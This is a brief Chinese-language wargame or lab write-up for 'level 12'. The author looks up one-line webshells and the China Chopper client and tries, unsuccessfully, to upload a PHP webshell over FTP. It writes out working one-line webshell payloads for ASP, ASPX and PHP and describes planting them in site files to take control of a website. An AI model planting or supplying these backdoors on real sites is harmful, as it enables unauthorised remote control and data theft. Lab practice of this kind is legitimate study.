第十二关 我系统密码忘记了!
使用前面更改后的账号密码登陆账号后,如图一所示:
图一
我不知道这该怎么办,攻略里提到要创建一句话木马和中国菜刀,于是我就查了一下“一句话木马”和中国菜刀这两个东西。
链接:https://blog.csdn.net/xxxslinyue/article/details/79397973
一.基本操作:
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录
二.实战
asp的一句话是:
<%eval request ("pass")%>
aspx的一句话是:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句话是:
<?php @eval($_POST['pass']);?>
我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。
既然了解了这两个东西,那么我们按照步骤一步一步来,首先我们创建一句话木马,我们这里需要创建的是php的,即“<?php @eval($_POST['pass']);?>”,如图二所示:
图二
有了一句话木马的文件,我们需要一个可以上传的程序,即FTP服务器,那么我们现在就安装vsftp吧(参考链接:https://www.cnblogs.com/Hi-blog/p/5958252.html)
因为我vsftp登陆不成功,只能暂时放下这道题了。。。
